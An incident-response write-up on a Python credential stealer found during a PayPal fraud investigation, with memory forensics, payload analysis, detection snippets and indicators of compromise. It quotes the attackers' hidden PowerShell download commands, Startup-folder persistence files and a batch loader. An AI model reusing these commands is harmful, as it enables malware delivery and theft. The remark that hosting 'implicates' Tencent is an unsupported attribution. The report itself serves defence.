Key Findings
- The SECUINFRA Falcon Team discovered an unknown Python malware during a fraud investigation
- The threat actors made heavy use of obfuscation and disposable infrastructure
- In addition to the custom malware off-the-shelf offensive tools like CobaltStrike were used
Introduction
Alertness and vigilance are crucial in cybersecurity. When repeating this truism, most of us think of social engineering attacks and of educating users to recognize a phishing mail or a scam call. However, an attentive user can also provide valuable insights on a more technical level.
A recent incident response case started when the user noticed "strange black windows" on the desktop and took screenshots of them. This was accompanied by PayPal transfers from the user's account that the user had not authorized.

Figure 1: Screenshot captured by the victim, Console output hints at payload decoding and execution
Evidently, a script was run on the computer. Its output should have been suppressed by the "echo off" command, but due to a problem in the script the command was preceded by stray characters, which rendered it inexecutable. Because the screenshots were preserved, we can tell that some kind of decoding action and injection apparently took place.
Investigating the compromised client
We further investigated the computer by running the THOR Scanner, which gave us ample evidence to gain further understanding of the compromise.
The event trace log BootPerfDiagLogger.etl contained numerous entries that THOR extracted for further analysis. They showed the following command line:
CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -c "$ProgressPreference='SilentlyContinue'; try { iwr 'http://43.156.63[.]124/svchoss.exe' -OutFile 'C:\Users\admin\AppData\Local\Temp\svchoss.exe' -ErrorAction Stop; exit 0 } catch { exit 1 }"
This command uses PowerShell to download the file "svchoss.exe" from the IP address 43.156.63[.]124 and store it in a Temp directory. THOR flagged this filename as homomorphic abuse, i.e. it mimics svchost.exe to fly under the radar.
The IP address it is downloaded from is part of the Autonomous System AS 132203, labelled "Tencent Building, Kejizhongyi Avenue", implicating the Chinese company Tencent in the attack. The IP address has been linked with numerous recent attacks.
Tencent is not only a well-known Chinese multimedia company; due to its location, it is also a popular place to host C2 infrastructure, especially for Chinese threat actors.
Furthermore, THOR pointed us to a range of suspicious .bat and .vbs files:
C:\Users\admin\AppData\Roaming\nuil.bat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12.bat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esae.bat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rech.bat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esae.vbs
The corresponding events had timestamps of the same day as the screenshots.
Memory Dump Analysis
We followed these results up with an analysis of the memory dump we obtained from the customer. Using Volatility 3, we started with the usual modules: pstree, psxview, dlllist, ldr_modules, suspended_threads and cmdscan. Unfortunately, this was not of much avail. We did find a suspended explorer thread with TID 8812. As indicated in the screenshot, this could be related to the incident, but it was a weak lead.
Running Strings64.exe on the memory dump, searching for strings with more than 5 characters, yielded more than 2 gigabytes of strings.
A string search for the following IOCs, which we had obtained from THOR so far:
- svchoss
- python
- 43.156.63.124
- esae.vbs
- nuil.bat
- 12.bat
- esae.bat
- rech.bat
- we.bin
- a.txt
- x.txt
- xro.py
- SystemCache25
yielded over 5000 results. It was clear that we had to narrow this down. Hits like
- Wikipedia.txt
- Nvida.txt
- index.txt
were removed.
Immediately conspicuous were the following lines:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -c $ProgressPreference='SilentlyContinue'; try { iwr 'http://43.156.63[.]124/svchoss.exe' -OutFile 'C:\Users\admin\AppData\Local\Temp\svchoss.exe' -ErrorAction Stop; exit 0 } catch { exit 1 }
HostApplication=powershell -WindowStyle Hidden -c iwr 'http://43.156.63[.]124/esae.vbs' -OutFile "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\esae.vbs"
HostApplication=powershell -Command Invoke-WebRequest -Uri 'https://syracuse-seeks-wilson-row.trycloudflare[.]com/of/extracted/12.bat' -OutFile 'C:\Users\admin\AppData\Local\Temp\12.bat'
HostApplication=powershell -Command Invoke-WebRequest -Uri 'https://syracuse-seeks-wilson-row.trycloudflare[.]com/of/extracted/rech.bat' -OutFile 'C:\Users\admin\AppData\Local\Temp\rech.bat'
http://msedge.b.tlu.dl.delivery.mp.microsoft[.]com/filestreamingservice/files\rech.bat'
set DIR=%LOCALAPPDATA%\Microsoft\SystemCache25
if exist "%DIR%\xro.py" (
if exist "%DIR%\we.bin" (
if exist "%DIR%\x.txt" (
python xro.py -i vue.bin -k o.txt
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command Copy-Item '\\syracuse-seeks-wilson-row.trycloudflare[.]com@SSL\davwwwroot\nuil.bat' 'C:\Users\admin\AppData\Roaming\nuil.bat'
We not only confirmed the presence of the screenshotted code, but also generated further IOCs and confirmed the maliciousness of the .bat and .vbs files found by THOR. The code indicates that the malicious actor deployed a Python installation to the directory %LOCALAPPDATA%\Microsoft\SystemCache25.
The host syracuse-seeks-wilson-row.trycloudflare[.]com no longer resolved at the time of the investigation. The domain trycloudflare[.]com is legitimate and belongs to Cloudflare.
msedge.b.tlu.dl.delivery.mp.microsoft[.]com is hosted by Fastly, Inc. The record was last updated on the day of the incident. The URL returned a 403 error when we tried to download the .bat file. The domain belongs to Microsoft. Given the nature of this domain, it is most likely a red herring for investigators to stumble across, not an actual second stage. The Cloudflare domain is part of an ongoing trend among threat actors to use legitimate cloud services for C2 and payload delivery.
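The command lines above and the one from the event trace log share a handful of traits: a hidden PowerShell window, an execution-policy bypass, a download from a bare IP address, a drop into Temp or the Startup folder, a WebDAV copy from a tunnel domain, and a process name one letter off from svchost.exe. The following added example (our own illustration, not code from the report) scores constructed sample lines against those traits; the IP address and tunnel hostname in the samples are placeholders.

```python
import re
from difflib import SequenceMatcher

# Constructed sample command lines, modelled on the ones quoted in this report
# (IP and tunnel host are placeholders, not the real indicators).
SAMPLE_LINES = [
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -c "iwr 'http://203.0.113.10/svchoss.exe' -OutFile 'C:\Users\admin\AppData\Local\Temp\svchoss.exe'"''',
    r'''powershell -WindowStyle Hidden -c iwr 'http://203.0.113.10/esae.vbs' -OutFile "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\esae.vbs"''',
    r'''powershell -Command Copy-Item '\\example-tunnel.trycloudflare.com@SSL\davwwwroot\nuil.bat' "C:\Users\admin\AppData\Roaming\nuil.bat"''',
    r'''powershell -NoProfile -Command Get-ChildItem "C:\Users\admin\Documents"''',
]

# Each indicator on its own is weak; the chain in this report combines several of them.
INDICATORS = {
    "hidden_window": re.compile(r"-WindowStyle\s+Hidden", re.I),
    "policy_bypass": re.compile(r"-ExecutionPolicy\s+Bypass", re.I),
    "download_from_ip": re.compile(
        r"\b(?:iwr|Invoke-WebRequest)\b.*?https?://(?:\d{1,3}\.){3}\d{1,3}/", re.I),
    "drop_to_temp_or_startup": re.compile(r"-OutFile\s+.*?\\(?:Temp|Startup)\\", re.I),
    "webdav_copy": re.compile(r"Copy-Item\s+\S*@SSL\\davwwwroot\\", re.I),
    "tunnel_domain": re.compile(r"\.trycloudflare\.com", re.I),
}

# Process names that malware likes to imitate (svchoss.exe vs. svchost.exe in this case).
TRUSTED_NAMES = ["svchost.exe", "explorer.exe", "lsass.exe", "csrss.exe", "winlogon.exe"]
EXE_TOKEN = re.compile(r"[\w.-]+\.exe\b", re.I)


def lookalike_names(line, threshold=0.85):
    """Return executable names that are close to, but not equal to, a trusted name."""
    found = []
    for token in {m.group(0).lower() for m in EXE_TOKEN.finditer(line)}:
        for trusted in TRUSTED_NAMES:
            if token != trusted and SequenceMatcher(None, token, trusted).ratio() >= threshold:
                found.append(token)
    return sorted(found)


def analyze(line):
    """Score one command line; two or more indicators, or a lookalike name, flags it."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(line)]
    names = lookalike_names(line)
    return {"hits": hits, "lookalikes": names,
            "suspicious": len(hits) >= 2 or bool(names)}


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        result = analyze(line)
        print("SUSPICIOUS" if result["suspicious"] else "ok        ", result["hits"], result["lookalikes"])
```

The same scoring can be pointed at PowerShell operational logs (event ID 4104 script blocks) or at strings pulled from a memory image, as was done here.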
Furthermore, we were able to extract pristine copies of the screenshotted code from process memory (the closing parenthesis of the outermost if block was missing in the extracted copy and has been added here):
@echo off
set DIR=%LOCALAPPDATA%\Microsoft\SystemCache25
if exist "%DIR%\python.exe" (
if exist "%DIR%\xro.py" (
if exist "%DIR%\we.bin" (
if exist "%DIR%\x.txt" (
cd /d "%DIR%"
python xro.py -i we.bin -k a.txt
)
)
)
)
Unfortunately, it could not be clearly associated with one specific process.
Searching for the known filenames in process handles and in file names gave us some hits for
\Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25
\Users\admin\AppData\Local\Microsoft\SystemCache25
and even \Users\admin\AppData\Local\Microsoft\SystemCache25\python.exe.
However, the only processes still running with a handle to the SystemCache25 folder were two instances of explorer.exe. The processes associated with the SystemCache25 files and python.exe had already terminated when the image was taken.
The following file names were identified as well, giving us further insight into the Python installation in SystemCache25:
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\_ctypes.pyd
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\libffi-8.dll
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\python3.dll
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\python.exe
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\_zstd.pyd
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\_lzma.pyd
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\_bz2.pyd
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\libffi-8.dll
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\_ctypes.pyd
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\vcruntime140.dll
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\python315.dll
admin@file:///C:/Users/admin/AppData/Local/Microsoft/SystemCache25/x.txt
\Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25
At this point, we would have normally started investigating artifacts from the system’s hard drive. Unfortunately, it was not possible to acquire a triage or an image from the system’s hard drive. Instead, we pivoted off the IP 43.156.63[.]124 that we found as a string in memory. We were able to identify and pull some of the payloads hosted there:
vs.exe, SHA-256 a57a08802002bb2e67f33143a17e027d07022e2aa3743840c8f18ced2c2b5217: some kind of shellcode loader?
012.exe, SHA-256 7a58c3106c38dbd56dda242deac02eea9bef8f064e62e6435849048fd036ceb1: XWorm RAT v5.6
2.4.exe, SHA-256 3d9239e8ed6b4f29f5754c934749110491ba821c31d758c2bc3e571c1375798a: HTran tunneling tool
02.08.2022.exe, SHA-256 40ef98e3251741b57792a42246eb238c4c12936d2db00bef2b8389b834ce7b52: Cobalt Strike Beacon
svchoss.exe, SHA-256 3483344d12e26ceb42c9c63d1d941c5309dd34d37ecb449922ef85647b726f58: PyInstaller malware
esae.vbs was unfortunately not among these samples.
Additionally, multiple services such as an FTP server, MySQL and a Cobalt Strike Team Server are hosted on this system.
Abuse.ch ThreatFox lists multiple records of TCP ports on this host associated with Cobalt Strike and Empire activity:

Running 02.08.2022.exe through SentinelOne's Cobalt Strike parser confirmed that this is a Cobalt Strike Beacon. The IP address of its C2 server is identical to the address where the beacon is hosted.

Since svchoss.exe at least shares its name with the file downloaded to the compromised computer, we focused further investigations on this file. The file was known to VirusTotal as of December 5th, 2025, with 41 of 71 engines detecting it as malicious: https://www.virustotal.com/gui/file/3483344d12e26ceb42c9c63d1d941c5309dd34d37ecb449922ef85647b726f58/details

We found several strings inside the .exe file referring to Python and to Python cryptography modules. VirusTotal also showed access to several files in
- C:\Users\<USER>\AppData\Local\Chromium\User Data\AutofillStates\
- C:\Users\<USER>\AppData\Local\48e7a6ba7f72710ae085ed2aae203bf1\<USER>@DESKTOP-ET51AJO_en-US\Wallets\Edge_Wallet\Edge_Exodus\
- C:\Users\<USER>\AppData\Local\48e7a6ba7f72710ae085ed2aae203bf1\<USER>@DESKTOP-ET51AJO_en-US\Browsers\Mozilla\Firefox\
among others. This indicates that it is indeed a credential stealer.
We proceeded to extract the contents of this file with the tool pyinstxtractor-ng.
The script identified the Python version as 314 and the following possible entry points:
- pyiboot01_bootstrap.py
- pyi_rth_inspect.py
- pyi_rth_pkgutil.pyc
- pyi_rth_multiprocessing.pyc
- pyi_rth_setuptools.pyc
- test_expert_silent_temp.pyc
The following files were extracted:

The extraction of PYZ.pyz failed. Further files of notice were:
- python314.dll
- the folder pyarmor_runtime_011117
The python314.dll was present to confuse analysis tools with a wrong version number. The use of pyarmor was inferred from the presence of the related folder.
The file test_expert_silent_temp.pyc was immediately suspicious, as it is not a regular Python file, so we tried to decompile it with uncompyle6. This file, as well as all the other files, had the unknown magic number 3627. We replaced it with A7 0D 0D 0A for Python 3.11 (3495). After this, the attempt still failed, which was expected with pyarmor being present.
So far, we discovered the following techniques of obfuscation:
- wrong Python version number
- inconspicuous filename (test_expert_silent_temp.pyc)
- wrong magic number
- pyarmor
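The magic-number step above can be checked and repeated mechanically. The following added example (our own illustration, not the report's tooling) parses the 16-byte PEP 552 .pyc header, maps the magic number to a CPython version where known, and rewrites it the way described above (3495, i.e. A7 0D 0D 0A, for Python 3.11). The version table holds the values for 3.11 to 3.13 and adds the running interpreter's own magic at runtime; the sample header is constructed and carries a placeholder body, not real bytecode.

```python
import importlib.util
import struct
import sys

# Magic numbers as defined in CPython's importlib/_bootstrap_external.py. The entry
# for the interpreter running this script is added at runtime so the table is never stale.
KNOWN_MAGIC = {3495: "3.11", 3531: "3.12", 3571: "3.13"}
RUNNING_MAGIC = struct.unpack("<H", importlib.util.MAGIC_NUMBER[:2])[0]
KNOWN_MAGIC.setdefault(RUNNING_MAGIC, "%d.%d" % sys.version_info[:2])


def magic_bytes(number):
    """Encode a magic number the way CPython does: little-endian u16 followed by b'\\r\\n'."""
    return struct.pack("<H", number) + b"\r\n"


def parse_pyc_header(data):
    """Return (magic number, flags, version label or None) from a PEP 552 pyc header."""
    if len(data) < 16 or data[2:4] != b"\r\n":
        raise ValueError("not a pyc header")
    # Layout: u16 magic, b'\r\n', u32 flags, then 8 bytes of timestamp/size or source hash.
    magic, flags = struct.unpack("<HxxI", data[:8])
    return magic, flags, KNOWN_MAGIC.get(magic)


def rewrite_magic(data, number):
    """Replace the 4-byte magic so a decompiler for that version will read the file."""
    return magic_bytes(number) + data[4:]


# Constructed sample: the magic 3627 seen in the report, zero flags, a fake
# timestamp/size field and a placeholder body (not real marshal data).
SAMPLE_PYC = (magic_bytes(3627) + struct.pack("<I", 0)
              + struct.pack("<II", 0x5EADBEEF, 0) + b"<body>")


if __name__ == "__main__":
    magic, flags, version = parse_pyc_header(SAMPLE_PYC)
    print("original magic %d -> version %s, flags %d" % (magic, version, flags))
    patched = rewrite_magic(SAMPLE_PYC, 3495)
    print("patched header bytes:", patched[:4].hex(" ").upper())
    print("patched magic -> version", parse_pyc_header(patched)[2])
```

As the report notes, a matching magic number only gets the file past the decompiler's header check; with pyarmor in place the body is still not plain bytecode.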
Conclusion
Our investigation confirmed the malicious presence on the computer and generated further IOCs. THOR proved to be a great help in this, giving us an initial pivot point and strings to search for in the system's memory. Without a full system triage, we could not completely reconstruct the incident or establish the relations between the various data points.
We could not reconstruct the initial access vector. Given that a regular endpoint was infected, it most likely involved some kind of social engineering. A malicious web download or a malicious e-mail are the most probable scenarios.
Indicators of Compromise
Host-based artifacts
File Paths
%USERPROFILE%\AppData\Local\Temp\svchoss.exe
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\python.exe
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\we.bin
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\a.txt
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\x.txt
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\_ctypes.pyd
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\libffi-8.dll
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\python3.dll
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\_zstd.pyd
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\_lzma.pyd
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\_bz2.pyd
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\libffi-8.dll
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\_ctypes.pyd
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\vcruntime140.dll
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\python315.dll
C:\Users\admin\AppData\Roaming\nuil.bat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12.bat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esae.bat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rech.bat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esae.vbs
Hashes (SHA-256)
a57a08802002bb2e67f33143a17e027d07022e2aa3743840c8f18ced2c2b5217
7a58c3106c38dbd56dda242deac02eea9bef8f064e62e6435849048fd036ceb1
3d9239e8ed6b4f29f5754c934749110491ba821c31d758c2bc3e571c1375798a
40ef98e3251741b57792a42246eb238c4c12936d2db00bef2b8389b834ce7b52
3483344d12e26ceb42c9c63d1d941c5309dd34d37ecb449922ef85647b726f58
Network-based artifacts
Domains
https://syracuse-seeks-wilson-row.trycloudflare[.]com
IP addresses
43.156.63[.]124